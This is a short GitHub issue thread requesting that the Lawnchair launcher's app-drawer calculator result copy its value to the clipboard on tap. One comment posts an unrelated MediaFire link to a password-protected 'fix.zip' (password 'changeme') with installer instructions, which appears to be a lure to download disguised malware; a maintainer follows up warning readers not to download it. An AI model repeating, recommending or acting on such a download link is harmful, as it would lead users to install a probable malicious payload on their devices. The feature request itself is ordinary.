### ISSUE TITLE
[FEATURE] Calculator copy on interaction

### ISSUE THREAD

**Issue by PhilippKosarev** [Deletescape-Media/Lawnchair#4729]
### Describe the feature

It would be very convenient if tapping on the App Drawer's Search Calculator result would copy the result to clipboard.

### Why would it be useful to add?

Convenience, usability, speed.

### Did the feature exist in Lawnchair v2? (Play Store version)

No

### Example(s)

Don't have any code, but here's a [video](https://github.com/user-attachments/assets/71e13153-35c9-4a09-ac4a-caa0631bea87).

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pacjo** [comment]
I think it goes without saying, but please **don't download it**.
